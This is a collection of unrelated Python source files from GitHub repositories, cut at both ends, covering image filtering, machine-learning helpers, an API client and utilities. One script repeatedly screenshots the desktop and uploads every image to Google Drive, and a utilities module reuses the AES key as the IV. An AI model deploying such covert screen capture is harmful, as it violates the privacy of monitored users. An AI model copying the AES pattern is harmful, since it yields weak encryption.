j in range(enlarged_width)]\n\t\n\tfor x in range(width):\n\t\tfor y in range(height):\n\t\t\tenlarged_image[x + s][y + s] = origin_image[x][y]\n\n\tfor x in range(width):\n\t\tfor y in range(s):\n\t\t\tenlarged_image[x + s][y] = origin_image[x][y]\n\t\t\tenlarged_image[x + s][enlarged_height - y - 1] = origin_image[x][height - y - 1]\n\n\tfor x in range(s):\n\t\tfor y in range(height):\n\t\t\tenlarged_image[x][y + s] = origin_image[x][y]\n\t\t\tenlarged_image[enlarged_width - x - 1][y + s] = origin_image[width - x - 1][y]\n\n\tfor x in range(s):\n\t\tfor y in range(s):\n\t\t\tenlarged_image[x][y] = origin_image[x][y]\n\t\t\tenlarged_image[x][enlarged_height - y - 1] = origin_image[x][height - y - 1]\n\t\t\tenlarged_image[enlarged_width - x - 1][y] = origin_image[width - x - 1][y]\n\t\t\tenlarged_image[enlarged_width - x - 1][enlarged_height - y - 1] = origin_image[width - x - 1][height - y - 1]\n\n\treturn enlarged_image\n\ndef get_w(gaussian_mask_size):\n\tw = [0 for i in range(gaussian_mask_size * gaussian_mask_size)]\n\te = 2.71828\n\td = 5.0\n\tn = 0\n\tfor i in range(-2, 3):\n\t\tfor j in range(-2, 3):\n\t\t\tw[n] = e ** ( (-1) * (i * i + j * j) / (2 * d * d) )\n\t\t\tn += 1\n\n\treturn w\n\ndef count_gaussian_pixel(i, j, enlarged_image, gaussian_mask_size, w, sum):\n\tresult = 0.0\n\tmask_index = [ [0 for n in range(2)] for m in range(gaussian_mask_size * gaussian_mask_size)]\n\tstart = -1 * (gaussian_mask_size / 2)\n\tend = gaussian_mask_size / 2 + 1\n\tdis = gaussian_mask_size / 2\n\tn = 0\n\n\tfor x in range(start, end):\n\t\tfor y in range(start, end):\n\t\t\tmask_index[n][0] = i + x + dis\n\t\t\tmask_index[n][1] = j + y + dis\n\t\t\tn += 1\n\t\n\tfor x in range(gaussian_mask_size * gaussian_mask_size):\n\t\tresult += enlarged_image[mask_index[x][0]][mask_index[x][1]] * w[x]\n\n\tresult /= sum\n\t#print result\n\t#print mask_index\n\n\treturn result\n\ndef gaussian_filter(gaussian_mask_size, origin_image):\n\tenlarged_image = enlarge_image(gaussian_mask_size / 2, origin_image)\n\twidth = len(origin_image)\n\theight = len(origin_image[0])\n\tblured_image = [[255 for i in range(height)] for j in 
range(width)]\n\tw = get_w(gaussian_mask_size)\n\t\n\tsum = 0.0\n\n\tfor i in range(len(w)):\n\t\tsum += w[i]\n\n\tfor x in range(width):\n\t\tfor y in range(height):\n\t\t\tblured_image[x][y] = count_gaussian_pixel(x, y, enlarged_image, gaussian_mask_size, w, sum)\n\n\treturn blured_image\n\ndef gmask(origin_image, blured_image):\n\twidth = len(origin_image)\n\theight = len(origin_image[0])\n\tgmasked_image = [[255 for i in range(height)] for j in range(width)]\n\n\tfor x in range(width):\n\t\tfor y in range(height):\n\t\t\tgmasked_image[x][y] = origin_image[x][y] - blured_image[x][y]\n\t\n\treturn gmasked_image\n\ndef scal(gmasked_image):\n\twidth = len(gmasked_image)\n\theight = len(gmasked_image[0])\n\tscaled_image = [[255 for i in range(height)] for j in range(width)]\n\n\tfor x in range(width):\n\t\tfor y in range(height):\n\t\t\tscaled_image[x][y] = ( gmasked_image[x][y] + 255 ) / 2\n\n\treturn scaled_image\n\ndef unsharp_mask(origin_image, gmasked_image, k):\n\twidth = len(origin_image)\n\theight = len(origin_image[0])\n\tunsharp_image = [[255 for i in range(height)] for j in range(width)]\n\n\tfor x in range(width):\n\t\tfor y in range(height):\n\t\t\tunsharp_image[x][y] = origin_image[x][y] + k * gmasked_image[x][y]\n\n\treturn unsharp_image\n\n# function to print the image so as to see the enlarge function's output image\ndef print_image(image_array, image_print_name):\n\twidth = len(image_array)\n\theight = len(image_array[0])\n\n\tprintImage = Image.new('L',(width, height), 'white')\n\tdraw = ImageDraw.Draw(printImage)\t\n\n\tfor i in range(width):\n\t\tfor j in range(height):\n\t\t\tdraw.point((i, j), image_array[i][j])\n\n\tfilename = image_print_name + '.bmp'\n\tprintImage.save(filename, format='BMP')\t\t\n\n# open an image and get its information\nimage_name = 'Fig0340(a)(dipxe_text)'\nim = Image.open(image_name+'.tif')\ndata = im.load()\nwidth, height = im.size\ngaussian_mask_size = 5\norigin_image = [[ 255 for i in range(height)] for j in range(width)]\nk = 3\n\nget_origin()\n\nblured_image = gaussian_filter(gaussian_mask_size, origin_image)\ngmasked_image = gmask(origin_image, blured_image)\nscal_gmasked_image = scal(gmasked_image)\nunsharp_masking_image = unsharp_mask(origin_image, gmasked_image, 1)\nhighboost_filter_image = unsharp_mask(origin_image, gmasked_image, k)\n\nprint_image(origin_image, 'origin_image')\nprint_image(blured_image, 'gaussian_blured_image')\nprint_image(scal_gmasked_image, 'scal_gmasked_image')\nprint_image(unsharp_masking_image, 'unsharp')\nprint_image(highboost_filter_image, 'highboost_filter_image')\n","repo_name":"FionaT/Digital-Image-Processing_Proj","sub_path":"proj_3/0305/proj_03-05-b.py","file_name":"proj_03-05-b.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"21386976698","text":"'''\n图像梯度:计算图像像素某个领域的灰度变化,类似导数,图像梯度变化较大时,可能是边缘\n'''\n\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg = cv2.imread('image.bmp',0)\n\nlaplacian = cv2.Laplacian(img, cv2.CV_64F)\nsobelx = cv2.Sobel(img, cv2.CV_64F,1,0,ksize=5)\nsobely = cv2.Sobel(img, cv2.CV_64F,0,1,ksize=5)\n\nplt.subplot(2,2,1), plt.imshow(img, cmap='gray')\nplt.title('Origional'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,2,2),plt.imshow(laplacian,cmap = 'gray')\nplt.title('Laplacian'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,2,3),plt.imshow(sobelx,cmap = 'gray')\nplt.title('Sobel X'), plt.xticks([]), 
plt.yticks([])\nplt.subplot(2,2,4),plt.imshow(sobely,cmap = 'gray')\nplt.title('Sobel Y'), plt.xticks([]), plt.yticks([])\n\nplt.show()\n\n","repo_name":"slientreed/opencv_python_learn","sub_path":"3_images_processing_in_openCV/6_Image_Gradients.py","file_name":"6_Image_Gradients.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"34408728650","text":"from cool_net.neuron import Neuron\nfrom cool_net.funcs import Funcs\n\nclass Layer:\n activation_funcs = [\"linear\",\"relu\",\"sigmoid\", \"tanh\",\"leaky_relu\"]\n\n def __init__(self, \n input_dimension, \n neuron_count, \n activation_func,\n weight_init_technique=\"random\",\n bias_init_technique=\"zero\"):\n if activation_func not in Layer.activation_funcs:\n raise Exception(f\"Error: activation function {activation_func} is not valid.\")\n self.activation_func = activation_func\n if weight_init_technique not in Neuron.techniques_weight_init:\n print(f\"Warning: weight initialization technique {weight_init_technique} not valid. using {Neuron.default_weight_init}\")\n weight_init_technique = Neuron.default_weight_init\n if bias_init_technique not in Neuron.techniques_bias_init:\n print(f\"Warning: bias initialization technqiue {bias_init_technique} is not valid. using {Neuron.default_bias_init}.\")\n bias_init_technique = Neuron.default_bias_init\n self.n_count = neuron_count\n self.n = [Neuron(input_dimension,weight_init_technique,bias_init_technique) for i in range(self.n_count)]\n\n def forward(self, x):\n return [neuron.forward(x) for neuron in self.n]\n \n def forward_pass(self, x):\n outputs = self.forward(x)\n if self.activation_func == \"linear\":\n return [Funcs.linear(output) for output in outputs]\n if self.activation_func == \"relu\":\n return [Funcs.relu(output) for output in outputs]\n if self.activation_func == \"sigmoid\":\n return [Funcs.sigmoid(output) for output in outputs]\n if self.activation_func == \"tanh\":\n return [Funcs.tanh(output) for output in outputs]\n if self.activation_func == \"leaky_relu\":\n return [Funcs.leaky_relu(output) for output in outputs]\n \n def load_params(self, params: dict):\n for i in range(self.n_count):\n self.n[i].load_weights(params[i]['w'])\n self.n[i].load_bias(params[i]['b'])\n \n def get_params(self) -> dict:\n params = {}\n for i in range(self.n_count):\n params[i] = {}\n params[i][\"b\"] = self.n[i].get_bias()\n params[i][\"w\"] = self.n[i].get_weights()\n return params\n ","repo_name":"lucriver/CoolNet","sub_path":"cool_net/layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"7435861925","text":"import numpy as np\nimport torch\n\n\nclass Preprocessor(object):\n \"\"\"\n Object to deal with preprocessing.\n Easier than defining a function.\n \"\"\"\n def __init__(self,\n image_range,\n input_range,\n mean,\n sdev,\n channels_last=True):\n self.image_range = image_range\n self.input_range = input_range\n self.mean = mean\n self.sdev = sdev\n self.channels_last = channels_last\n self.num_channels = None\n\n def __call__(self, img):\n if not isinstance(self.num_channels, (int, float)):\n self.num_channels = img.shape[-1] if self.channels_last else img.shape[0]\n\n if isinstance(img, np.ndarray):\n img = img.astype(\"float\")\n elif isinstance(img, torch.Tensor):\n img = img.float()\n\n # Preprocess an input image\n image_min = 
float(self.image_range[0])\n image_max = float(self.image_range[1])\n model_min = float(self.input_range[0])\n model_max = float(self.input_range[1])\n image_range = image_max - image_min\n model_range = model_max - model_min\n img = (((img - image_min) * model_range) / image_range) + model_min\n\n assert len(self.mean) == len(self.sdev)\n assert len(self.mean) in [self.num_channels, 1], \"Number of image normalization parameters must match number \" \\\n \"of channels or equal 1\"\n\n if len(self.mean) == self.num_channels:\n for channel in range(self.num_channels):\n if self.channels_last:\n img[..., channel] -= self.mean[channel]\n img[..., channel] /= self.sdev[channel]\n else:\n img[channel] -= self.mean[channel]\n img[channel] /= self.sdev[channel]\n else:\n img -= self.mean[0]\n img /= self.sdev[0]\n\n return img\n\n def denormalize(self, img):\n if len(self.mean) == self.num_channels:\n for channel in range(self.num_channels):\n if self.channels_last:\n img[..., channel] *= self.sdev[channel]\n img[..., channel] += self.mean[channel]\n else:\n img[channel] *= self.sdev[channel]\n img[channel] += self.mean[channel]\n else:\n img *= self.sdev[0]\n img += self.mean[0]\n\n image_min = float(self.image_range[0])\n image_max = float(self.image_range[1])\n model_min = float(self.input_range[0])\n model_max = float(self.input_range[1])\n image_range = image_max - image_min\n model_range = model_max - model_min\n\n img = ((img - model_min) * image_range) / model_range + image_min\n return img\n","repo_name":"i-pan/kaggle-rsna-cspine","sub_path":"src/skp/data/transforms/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"94"} +{"seq_id":"25771663120","text":"#Initialized ScriptFactory v0.2\n#Date: 2018-07-09 16:10:34.437894\n#Author(s)/Contact:\n#Dominique Dresen\t Dominique.Dresen@uni-koeln.de\n\n#Preparing Script for Experiment: MODELEXP\nfrom modelexp import App\nfrom modelexp.experiments.sas import SimultaneousSaxsSansSanspol\nfrom modelexp.models.sas import SphereCSSCoupled, InstrumentalResolution, Magnetic\nfrom modelexp.data import XyeData\nfrom modelexp.fit import LevenbergMarquardt\n\nfrom thesis_utils.materials import sld_xray_GALAXI, sld_neutrons_5A\n\napp = App()\nexpRef = app.setExperiment(SimultaneousSaxsSansSanspol)\n\ndataRef = app.setData(XyeData)\n\n\ndataRef.loadFromFile('../experimentalData/PMK18.xye', ['saxs'])\ndataRef.loadFromFile('../experimentalData/PMK18_LSDD_Nuclear20.dat', ['sans', 'sa'])\ndataRef.loadFromFile('../experimentalData/PMK18_SSDD_Nuclear20.dat', ['sans', 'la'])\n\ndataRef.loadFromFile('../experimentalData/PMK18_SSDD_Mag20_I+.dat', ['sans', 'p', 'la'])\ndataRef.loadFromFile('../experimentalData/PMK18_SSDD_Mag20_I-.dat', ['sans', 'm', 'la'])\ndataRef.loadFromFile('../experimentalData/PMK18_LSDD_Mag20_I+.dat', ['sans', 'p', 'sa'])\ndataRef.loadFromFile('../experimentalData/PMK18_LSDD_Mag20_I-.dat', ['sans', 'm', 'sa'])\n\ndataRef.sliceDomain(0.01, 0.5)\ndataRef.plotData()\n\nmodelRef = app.setModel(SphereCSSCoupled, [Magnetic, InstrumentalResolution])\nmodelRef.setParam(\"magSldCore\", 1.085e-06, minVal = 0, maxVal = 5e-06, vary = True)\nmodelRef.setParam(\"magSldShell\", 5e-09, minVal = 0, maxVal = 5e-06, vary = True)\n\nmodelRef.setParam(\"particleSize\", 53.52532255801053, minVal = 0, maxVal = 80, vary = True)\nmodelRef.setParam(\"dShell\", 3.06788487244511, minVal = 0, maxVal = 80, vary = 
True)\nmodelRef.setParam(\"dSurfactant\", 21.28, minVal = 0, maxVal = 80, vary = True)\nmodelRef.setParam(\"sigParticleSize\", 0.0579, minVal = 0, maxVal = 0.1, vary = True)\nmodelRef.setParam(\"i0_sans\", 0.028, minVal = 0, maxVal = 1, vary = True)\nmodelRef.setParam(\"bg_sans\", 0.0, minVal = 0, maxVal = 0.02, vary = False)\nmodelRef.setParam(\"i0_saxs\", 0.3193553851380457, minVal = 0, maxVal = 1, vary = True)\nmodelRef.setParam(\"bg_saxs\", 0.0010600000000000002, minVal = 0, maxVal = 0.02, vary = False)\n\nmodelRef.setConstantParam(\"sigD\", 0.)\nmodelRef.setConstantParam(\"sldCore_sans\", 8.34e-6)\nmodelRef.setConstantParam(\"sldShell_sans\", 7.00e-6)\nmodelRef.setConstantParam(\"sldSurfactant_sans\", 0.078e-6)\nmodelRef.setConstantParam(\"sldSolvent_sans\", 5.66e-6)\nmodelRef.setConstantParam('wavelength', 5.9984)\nmodelRef.setConstantParam('dWavelength', 0.04247)\nmodelRef.setConstantParam(\"dTheta_sa\", 0.0021)\nmodelRef.setConstantParam(\"dTheta_la\", 0.0038)\n\nmodelRef.setConstantParam(\"sldCore_saxs\", 52.07e-6)\nmodelRef.setConstantParam(\"sldShell_saxs\", 41.85e-6)\nmodelRef.setConstantParam(\"sldSurfactant_saxs\", 8.52e-6)\nmodelRef.setConstantParam(\"sldSolvent_saxs\", 7.55e-6)\nmodelRef.updateModel()\n\napp.setFit(LevenbergMarquardt)\n\napp.show()","repo_name":"DomiDre/PhDThesis","sub_path":"data/looselyPackedNP/ios-11/sas/sim_saxs_sans_sanspol/MODELEXP_sasCoreshell.py","file_name":"MODELEXP_sasCoreshell.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"20819214491","text":"import os, os.path\nfrom datetime import date\n\nfrom googleapiclient import discovery\nfrom googleapiclient.http import MediaFileUpload \nfrom httplib2 import Http\nfrom httplib2.error import ServerNotFoundError\nfrom oauth2client import file, client, tools\nimport pyscreenshot\n\n# Obtaining application credentials & Authenticating\nSCOPES = 'https://www.googleapis.com/auth/drive'\nstore = file.Storage('storage.json')\ncreds = store.get()\nif not creds or creds.invalid:\n flow = client.flow_from_clientsecrets('credentials.json', SCOPES)\n creds = tools.run_flow(flow, store)\n\n# Creating Service \nDRIVE = discovery.build('drive', 'v3', http=creds.authorize(Http()))\n\ndef get_file_details(file_name, mime_type, parent_file_id = None):\n if parent_file_id == None :\n file_list = DRIVE.files().list(q = f\"name = '{file_name}' and mimeType = '{mime_type}'\").execute().get('files')\n else:\n file_list = DRIVE.files().list(q = f\"parents = '{parent_file_id}' and name = '{file_name}' and mimeType = '{mime_type}'\").execute().get('files')\n if len(file_list) == 0 :\n print(\"No Files Found, fileDetails()\")\n elif len(file_list) == 1:\n file_details = file_list[0]\n return file_details\n else:\n print(\"More Than One File Found, fileDetails()\")\n\ndef create_folder(new_folder_name, parent_folder_id = None, should_return_details = False):\n folder_metadata = {\n 'name' : new_folder_name,\n 'mimeType' : 'application/vnd.google-apps.folder'\n }\n if parent_folder_id is not None:\n folder_metadata['parents'] = [parent_folder_id]\n DRIVE.files().create(body = folder_metadata).execute()\n if should_return_details:\n return get_file_details(new_folder_name,'application/vnd.google-apps.folder', parent_file_id = parent_folder_id)\n\ndef check_folder_exits(folder_name, parent_folder_id = None):\n if parent_folder_id == None:\n folder = DRIVE.files().list(q = f\"name = '{folder_name}' and mimeType = 
'application/vnd.google-apps.folder'\").execute().get('files')\n else:\n folder = DRIVE.files().list(q = f\"parents = '{parent_folder_id}' and name = '{folder_name}' and mimeType = 'application/vnd.google-apps.folder'\").execute().get('files') \n if len(folder) == 1:\n return True\n elif len(folder) > 1:\n pass\n else:\n return False\n\ndef upload_file(to_folder_id, file_name, mime_type):\n file_metadata = {\n 'name' : file_name,\n 'parents' : [to_folder_id],\n 'mimeType' : mime_type}\n media = MediaFileUpload(file_name)\n try:\n DRIVE.files().create(\n body = file_metadata,\n media_body = media\n ).execute()\n print(file_name)\n except TimeoutError:\n print(\"TimeOut Error\")\n\ndef find_img_num(img_folder_id):\n files = DRIVE.files().list(q = f\"parents = '{img_folder_id}'\", pageSize = 1).execute().get('files')\n if len(files) == 0:\n return 0\n else:\n return int(files[0]['name'][5:][:-4])\n\ndef take_image(img_num):\n ss = pyscreenshot.grab()\n ss.save(f\"photo{img_num}.png\")\n return f\"photo{img_num}.png\"\n\ndef client_test_and_details(application_folder_id):\n client_name = os.getlogin() \n client_status = check_folder_exits(client_name, application_folder_id)\n if not client_status:\n return create_folder(application_folder_id, client_name, should_return_details = True) \n else :\n return get_file_details(client_name, 'application/vnd.google-apps.folder',parent_file_id = application_folder_id)\n\ndef current_day_folder(client_folder_id, current_date = str(date.today())):\n if check_folder_exits(current_date, client_folder_id):\n return get_file_details(current_date, 'application/vnd.google-apps.folder',parent_file_id = client_folder_id)\n else:\n return create_folder(client_folder_id, current_date, should_return_details = True)\n\ndef check_trashed(file_id):\n return DRIVE.files().get(fileId = file_id, fields='parents,name,trashed').execute().get('trashed')\n\ndef main():\n if check_folder_exits('pno01-screen-monitor'):\n parent_folder_id = get_file_details('pno01-screen-monitor', 'application/vnd.google-apps.folder').get('id') \n else:\n parent_folder_id = create_folder('pno01-screen-monitor', should_return_details = True).get('id') \n client_details = client_test_and_details(parent_folder_id)\n current_day_details = current_day_folder(client_details.get('id'))\n img_num = find_img_num(current_day_details.get('id'))\n while True:\n data_folder_id = current_day_details.get('id')\n photo_file = take_image(img_num)\n upload_file(data_folder_id, photo_file, 'image/png')\n os.remove(photo_file)\n img_num += 1 \n\nif __name__ == '__main__':\n main()","repo_name":"hellosafwaan/screen-monitor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"20194445764","text":"import socket\nimport time\nimport datetime\nfrom hashlib import md5, sha1\nimport emoji\nfrom googletrans import Translator\nfrom typing import List, Dict\nimport urllib.parse\nfrom . 
import crawl\nimport json\nimport re\nimport base64\nfrom Crypto.Cipher import AES\n\n\ndef get_local_ip():\n \"\"\"\n 获取本地内网ip\n \"\"\"\n ip = None\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect(('8.8.8.8', 80))\n ip = s.getsockname()[0]\n s.close()\n except:\n pass\n return ip\n\n\ndef encrypt(char, method='md5'):\n \"\"\"\n 支持md5和sha1加密方式\n :param char:\n :param method:\n :return:\n \"\"\"\n char = str(char)\n if method == 'md5':\n m = md5()\n elif method == 'sha1':\n m = sha1()\n m.update(char.encode('utf8'))\n return m.hexdigest()\n\n\ndef stamp_to_date(time_int: int or str):\n '''\n 时间戳转GTM+8(东八区)时间,\n :param time_int:\n :param time_int(int): 十位数时间戳\n :return(datatime): 时间\n\n examples:\n print(time_stamp(1547111111))\n '''\n ll = len(str(time_int))\n if isinstance(time_int, str):\n time_int = int(time_int[:10])\n if ll > 10:\n time_int = int(time_int / 10 ** (ll - 10))\n\n chTime = time.localtime(time_int)\n output = time.strftime(\"%Y-%m-%d %H:%M:%S\", chTime)\n return output\n\n\n# 当前时间转固定格式\ndef date_to_char(type='s', ctime=None, seperation=None):\n \"\"\"\n 当前时间转成年月日时分秒形式\n :return:\n \"\"\"\n if not ctime:\n ctime = datetime.datetime.now()\n if type == 's':\n char = ctime.strftime('%Y_%m_%d_%H_%M_%S')\n elif type == 'm':\n char = ctime.strftime('%Y_%m_%d_%H_%M')\n if seperation is None:\n return char.replace('_', '')\n elif seperation == 'normal':\n char = ctime.strftime('%Y-%m-%d %H:%M:%S')\n else:\n char = ctime.strftime('%Y_%m_%d_%H_%M_%S').replace('_', seperation)\n return char\n\n\n# 定时器\ndef control(star_time: int or float = 0,\n cycle: int or float = 86400,\n scope: int or float = 100):\n \"\"\"\n :param star_time: 任务开始时间\n :param cycle: 任务周期\n :param scope: 开始时间波动范围\n :return:\n \"\"\"\n if scope + star_time * 3600 <= (int(time.time()) + 8 * 3600) % cycle <= scope * 2 + star_time * 3600:\n return 1\n else:\n return 0\n\n\ndef emoji_transfer(chars: str or List[str]) -> str or List[str]:\n \"\"\"\n 对字符的表情进行转换\n :param char:\n :return:\n \"\"\"\n result = []\n if isinstance(chars, list):\n for char in chars:\n result.append(emoji.demojize(char))\n return result\n else:\n return emoji.demojize(chars)\n\n\ndef google_trans(chars: str or List[str] or iter,\n translator: Translator = None,\n return_type: str = 'list',\n dest='en',\n service_urls=['translate.google.cn']) -> List[str]:\n \"\"\"\n 谷歌翻译\n :param chars:\n :param translator:\n :param return_type:\n :return:\n \"\"\"\n if isinstance(chars, str):\n chars = [chars]\n if not translator:\n translator = Translator(service_urls=service_urls)\n result = translator.translate(chars, dest=dest)\n if return_type == 'list':\n return list(map(lambda x: x.text, result))\n else:\n return result\n\n\ndef baidu_trans(app_id: str,\n secret_key: str,\n query: str,\n from_lan: str = 'auto',\n to_lan: str = 'en',\n salt='robbe'\n ):\n \"\"\"\n\n :param app_id: your baidu api app_id\n :param secret_key: your baidu api secret_key\n :param query: something need to translate\n :param from_lan: from 【xxx】 language\n :param to_lan: to 【xxx】 language\n :param salt: salt\n :return:\n \"\"\"\n\n sign = app_id + query + str(salt) + secret_key\n sign = md5(sign.encode()).hexdigest()\n nn = 0\n while nn < 10:\n try:\n sub_url = '/api/trans/vip/translate' + '?appid=' + app_id + '&q=' + urllib.parse.quote(\n query) + '&from=' + from_lan + '&to=' + to_lan + '&salt=' + str(\n salt) + '&sign=' + sign\n\n url = 'https://fanyi-api.baidu.com/api/trans/vip/translate' + sub_url\n html = crawl.crawl(url).html\n data = 
json.loads(html)\n des_sentence = data['trans_result'][0]['dst']\n return des_sentence\n except Exception as e:\n print(e)\n nn += 1\n return None\n\n\ndef cprint(*char, c=None):\n '''\n 打印有颜色字体\n :param char(str or *str): 需要print的字符,可print多组字符\n :param c(list or str): 如果为str,则所有字体都是一个颜色;如果为list,长度需=字符组长度\n :return:\n\n examples:\n cprint('aaa', 'bbb','ccc', c=['r', 'g', 'b'])\n '''\n dic = {'r': '91',\n 'g': '92',\n 'y': '93',\n 'b': '94',\n 'p': '95',\n 'q': '96',\n 'z': '107,'\n }\n if c is None:\n print(*char)\n return\n\n if len(char) > len(c) and isinstance(c, list):\n c = c[0]\n\n try:\n if type(c) == str and c in dic:\n print(*(map(lambda x: '\\033[' + dic[c] + 'm' + str(x) + '\\033[0m', char)))\n return\n if type(c) == list:\n if len(c) != len(char):\n print(*(map(lambda x: '\\033[' + dic['z'] + 'm' + str(x) + '\\033[0m', char)))\n return\n else:\n print(*(map(lambda x, y: '\\033[' + dic[y] + 'm' + str(x) + '\\033[0m', char, c)))\n return\n except Exception as e:\n print(*char)\n return\n\n\ndef bytes_to_string(bytes_array):\n \"\"\"\n byte array to string, mainly used in Java type codes\n \"\"\"\n result = ''\n i = 0\n while i < len(bytes_array):\n value = bytes_array[i]\n if value >= 0:\n char = chr(value)\n i += 1\n else:\n tmp = ''\n values = bytes_array[i:i + 3]\n for value in values:\n value = 256 + value\n tmp += str(hex(value)).replace('0x', '\\\\x')\n i += 3\n char = eval(repr(tmp.encode('utf8')).replace('\\\\\\\\', '\\\\'))\n char = char.decode('utf8')\n result += char\n return result\n\n\ndef string_to_bytes(string):\n \"\"\"\n string array to byte, mainly used in Java type codes\n \"\"\"\n result = []\n for i in string:\n num = ord(i)\n if num < 256:\n result.append(num)\n if num > 255:\n values = bytes(i, encoding='utf8')\n values = re.findall('\\\\\\\\x[a-zA-Z0-9]{2}', str(values))\n values = list(map(lambda x: x.replace('\\\\', '0'), values))\n for value in values:\n result.append(- (256 - int(value, base=16)))\n return result\n\n\nclass Encryption:\n \"\"\"\n 加密模块\n \"\"\"\n\n @staticmethod\n def md5(char: str):\n char = str(char)\n m = md5()\n m.update(char.encode('utf8'))\n return m.hexdigest()\n\n @staticmethod\n def sha1(char: str):\n char = str(char)\n m = sha1()\n m.update(char.encode('utf8'))\n return m.hexdigest()\n\n class AESdiy:\n\n @staticmethod\n def aes_padding(text):\n bs = AES.block_size\n length = len(text)\n bytes_length = len(bytes(text, encoding='utf-8'))\n aes_padding_size = length if (bytes_length == length) else bytes_length\n aes_padding_l = bs - aes_padding_size % bs\n aes_padding_text = chr(aes_padding_l) * aes_padding_l\n return text + aes_padding_text\n\n @staticmethod\n def aes_unpadding(text):\n length = len(text)\n aes_unpadding_l = ord(text[length - 1])\n return text[0:length - aes_unpadding_l]\n\n @staticmethod\n def aes_encrypt(salt, content):\n ll = len(salt)\n assert ll <= 16, \"Length must less equal than 16 !\"\n for i in range(16 - ll):\n salt += '0'\n salt_bytes = bytes(salt, encoding='utf-8')\n cipher = AES.new(salt_bytes, AES.MODE_CBC, salt_bytes)\n content_aes_padding = Encryption.AESdiy.aes_padding(content)\n aes_encrypt_bytes = cipher.encrypt(bytes(content_aes_padding, encoding='utf-8'))\n aes_encrypt_char = str(base64.b64encode(aes_encrypt_bytes), encoding='utf-8')\n return aes_encrypt_char\n\n @staticmethod\n def aes_decrypt(salt, content):\n ll = len(salt)\n assert ll <= 16, \"Length must less equal than 16 !\"\n for i in range(16 - ll):\n salt += '0'\n salt_bytes = bytes(salt, encoding='utf-8')\n cipher = 
AES.new(salt_bytes, AES.MODE_CBC, salt_bytes)\n aes_encrypt_bytes = base64.b64decode(content)\n aes_decrypt_bytes = cipher.decrypt(aes_encrypt_bytes)\n aes_decrypt_char = str(aes_decrypt_bytes, encoding='utf-8')\n aes_decrypt_char = Encryption.AESdiy.aes_unpadding(aes_decrypt_char)\n return aes_decrypt_char\n\n\n\n\n\nprint(1)\nprint(2)\nprint('dev1')","repo_name":"robbebluecp/pack","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"34379741256","text":"from cqase.models import ResponseModel\n\n\nclass CustomFieldsApi:\n def __init__(self, app):\n self.app = app\n\n _GET_ALL_FIELDS = \"/custom_field\"\n _POST_NEW_FIELDS = \"/custom_field\"\n _GET_CUSTOM_FIELDS_BY_ID = \"/custom_field/{}\"\n _DELETE_CUSTOM_FIELDS = \"/custom_field/{}\"\n _UPDATE_CUSTOM_FIELDS = \"/custom_field/{}\"\n\n def get_all(self, params: dict = None) -> ResponseModel:\n \"\"\"\n https://developers.qase.io/reference/get-custom-fields\n \"\"\"\n return self.app.client.request(\n method=\"GET\",\n url=f\"{self.app.base_path}{self._GET_ALL_FIELDS}\",\n params=params,\n )\n\n def create(self, body: dict):\n \"\"\"\n https://developers.qase.io/reference/create-custom-field\n \"\"\"\n return self.app.client.request(\n method=\"POST\",\n url=f\"{self.app.base_path}{self._POST_NEW_FIELDS}\",\n json=body,\n )\n\n def get_by_id(self, uuid: int) -> ResponseModel:\n \"\"\"\n https://developers.qase.io/reference/get-custom-field\n \"\"\"\n return self.app.client.request(\n method=\"GET\",\n url=f\"{self.app.base_path}{self._GET_CUSTOM_FIELDS_BY_ID.format(uuid)}\",\n )\n\n def delete(self, uuid: int) -> ResponseModel:\n \"\"\"\n https://developers.qase.io/reference/delete-custom-field\n \"\"\"\n return self.app.client.request(\n method=\"DELETE\",\n url=f\"{self.app.base_path}{self._DELETE_CUSTOM_FIELDS.format(uuid)}\",\n )\n\n def update(self, uuid: int, body: dict) -> ResponseModel:\n \"\"\"\n https://developers.qase.io/reference/update-custom-field\n \"\"\"\n return self.app.client.request(\n method=\"PATCH\",\n url=f\"{self.app.base_path}{self._UPDATE_CUSTOM_FIELDS.format(uuid)}\",\n json=body,\n )\n","repo_name":"berpress/custom-qase-client","sub_path":"cqase/api/custom_fields.py","file_name":"custom_fields.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"41793313876","text":"\"\"\"\r\nintercepts.registration\r\n~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nThis module implements the intercepts registration api.\r\n\"\"\"\r\nfrom __future__ import annotations\r\n\r\nimport atexit\r\nimport ctypes\r\nimport struct\r\nimport sys\r\nimport types\r\nfrom collections import defaultdict\r\nfrom typing import Any, Callable, Type, TypeVar, cast\r\n\r\nfrom ._handlers import PTR_SIZE, get_addr, replace_cfunction\r\nfrom ._utils import replace_load_global\r\n\r\nT = TypeVar(\"T\")\r\n_HANDLERS: dict[tuple[int, Type], list[tuple[Any, ...]]] = defaultdict(list)\r\n\r\n\r\ndef _check_intercept(obj, handler):\r\n if not isinstance(handler, types.FunctionType):\r\n raise ValueError(\"Argument `handler` must be a function.\")\r\n if obj == handler:\r\n raise ValueError(\"A function cannot handle itself\")\r\n\r\n\r\ndef register(obj: T, handler: Callable) -> T:\r\n r\"\"\"Registers an intercept handler.\r\n\r\n :param obj: The callable to intercept.\r\n :param handler: A function to handle the intercept.\r\n 
